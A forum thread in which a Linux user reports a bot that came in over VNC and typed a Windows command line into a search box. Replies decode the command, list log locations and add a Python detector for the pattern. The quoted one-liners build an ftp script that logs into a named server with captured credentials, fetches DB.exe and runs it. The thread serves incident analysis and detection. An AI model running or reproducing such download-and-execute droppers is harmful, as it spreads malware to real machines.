A bot/human tried connecting to my vncserver.
Basically, at the time I was looking up something on Google, and the previous days my friend had been helping me do some stuff in Ubuntu Linux by connecting remotely. So anyhow, I was looking something up in Google when suddenly I got a prompt for someone to access my PC remotely. I immediately assumed it was my friend and allowed it, and didn't note the IP address. I'm on Linux, so the attempt failed in 2 ways. Here's what I saw when I allowed it; this was typed into the Google search box. What you see could be fragments because I clicked out of the search box a few times.
:evil:h4x0r:evil:n00b:evil:Attempt:evil:below:evil:lol:evil:0wned:evil:
"systemroot%\system32\cmd.exe &echo binary > > &echo get D B.exe >>&echo bye >> &ftp -n -v -s &del & DB.exe &exit"
:evil::evil::evil::evil:evil h4x0r attempt failed:evil::evil::evil::evil:
That is what I can recover. The whole time I figured it was my friend logging in and screwing around, but he says he didn't do it. I had him connect and look for VNC logs of previous allowed connections; he couldn't find any. But does anyone know what happened? And where the logs are?
Well, here are the directories for the logs, and you can usually view them with a text editor like gedit.
=> /var/log/messages : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log messages to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package logs, including package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All user-level logs
=> /var/log/xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file
I think this is the log for VNC: /home/user/.vnc/xstartup
I waited for it; it's 3 am, which makes it an unusual time to be on the computer, but I was busy tonight so...
Here's what I got so far, which is missing maybe half a second of text because I screenshotted the IP address:
cmd /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s
Specifics: "B0t _A159753b" "xbytez.com" "open ftpd"
It's a bot with a hostname of "wsip-70-168-158-181.oc.oc.cox.net", IP address: 70.168.158.181
If you understood what it says, it's trying to create a file called "ik" with instructions which it will then pass to the command "ftp" to:
Ftp> open ftpd.xbytez.com.zr 21 ftp> user B0t _A159753b ftp> binary ftp> get DB.exe
I suggest you dump VNC. Check your ports to see what's open and scan your computer with a good A/V program (in safe mode). Look for DB.exe.
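The "echo ... >> ik" then "ftp -s" pattern the posts above walk through is easy to pick out of command-line or keystroke logs. As an added detection example (not code from anyone in this thread), the function below parses a recovered command line, recognises an ftp script being assembled with echo redirections and fed to ftp -s, and returns the host, port, account name, script file and downloaded file names so a defender can block and hunt for them; the sample lines are constructed, with the host and credentials replaced by placeholders.

```python
import re

# Constructed sample log lines modelled on the command line quoted in this
# thread; host, user and password are placeholders, not values from the page.
SAMPLE_LINES = [
    'cmd /c echo open ftpd.example.invalid 21 >> ik &echo user botuser hunter2 >> ik '
    '&echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &DB.exe &exit',
    'cmd /c echo backup done >> C:\\logs\\job.txt',   # benign echo, no ftp
    'ftp -n -v -s:deploy.txt',                         # ftp script, but not built via echo
]

# "echo <text> >> <file>" (tolerates the "> >" spacing seen in the first fragment)
ECHO_RE = re.compile(r'echo\s+(.+?)\s*>\s*>\s*(\S+)', re.I)
# an "ftp" command at the start of the line or after a &, | or ; separator
FTP_RE = re.compile(r'(?:^|[&|;]\s*)ftp\b([^&|;]*)', re.I)


def parse_ftp_dropper(cmdline):
    """Return extracted indicators if cmdline writes an ftp script with echo
    redirections and then runs ftp -s on it; otherwise return None."""
    scripts = {}
    for text, fname in ECHO_RE.findall(cmdline):
        scripts.setdefault(fname, []).append(text.strip())
    ftp = FTP_RE.search(cmdline)
    if ftp is None or not scripts:
        return None
    m = re.search(r'-s:?\s*(?!-)(\S+)?', ftp.group(1))
    if m is None:
        return None
    # The captured fragment ends at "-s" with no file name; fall back to the
    # only script file the echoes wrote, which is what the bot would pass.
    script = m.group(1) or (next(iter(scripts)) if len(scripts) == 1 else None)
    if script not in scripts:
        return None
    info = {'script': script, 'host': None, 'port': None, 'user': None, 'downloads': []}
    for line in scripts[script]:
        parts = line.split()
        if parts[0].lower() == 'open' and len(parts) >= 2:
            info['host'] = parts[1]
            info['port'] = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
        elif parts[0].lower() == 'user' and len(parts) >= 2:
            info['user'] = parts[1]          # password deliberately not recorded
        elif parts[0].lower() == 'get' and len(parts) >= 2:
            info['downloads'].append(parts[1])
    return info


def scan(lines):
    """Return (index, indicators) for every line matching the dropper pattern."""
    hits = []
    for i, line in enumerate(lines):
        hit = parse_ftp_dropper(line)
        if hit:
            hits.append((i, hit))
    return hits
```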
I thought this was patched in VNC; what version do you have? Anyway, you got jacked. Do not leave remote access on all the time, and better yet, know who is connecting.
http://isc.sans.org/diary.html?storyid=3630
Go there; apparently it's a bot that is easily attainable. Some kid got hacked while playing a PC game. Could help with your problem.
hellboundhackersok wrote: Lol, that bot tried attacking a Windows computer, and you were on Linux, so you have nothing to worry about…
linux pwns
Exactly! :) So korg, it wouldn't affect me considering the bot typed it all in Google. I tried logging into the FTP; I couldn't get in. What's the user/pass? Isn't the username something like B0T_A157#something#something#something? I think it's a problem with VNC. I'll just update VNC, see what that does.
Wrong, read the last line of the code: FTP -n -v -s. So you can't use ftp on Linux, eh?
http://linux.about.com/od/commands/l/blcmdl1_ftp.htm
Works both ways.